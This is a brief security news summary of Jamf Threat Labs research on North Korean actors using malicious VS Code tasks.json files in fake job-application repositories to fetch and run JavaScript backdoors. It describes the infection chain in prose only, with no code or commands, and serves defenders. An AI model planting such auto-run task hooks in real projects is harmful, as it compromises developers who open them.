Jamf Threat Labs uncovered new Visual Studio Code abuse in the Contagious Interview campaign, linked to North Korean actors. Attackers use malicious `tasks.json` files to trigger JavaScript-based backdoors when developers open compromised repositories.

The infection chain starts when victims clone repositories hosted on GitHub or GitLab, often disguised as job applications. Opening these projects in VS Code triggers background shell commands that fetch payloads from domains like `vercel.app`, executing them via Node.js without user interaction.

Payloads include obfuscated JavaScript with unused code likely meant to evade detection. Core functions enable persistent command-and-control communication, system fingerprinting, and remote code execution. Some samples show signs of AI-assisted development and can self-terminate processes on demand.

Security teams should monitor for unusual task configurations in developer environments. As attackers embed malware deeper into legitimate workflows, traditional endpoint defenses may miss these early-stage compromises targeting engineers directly.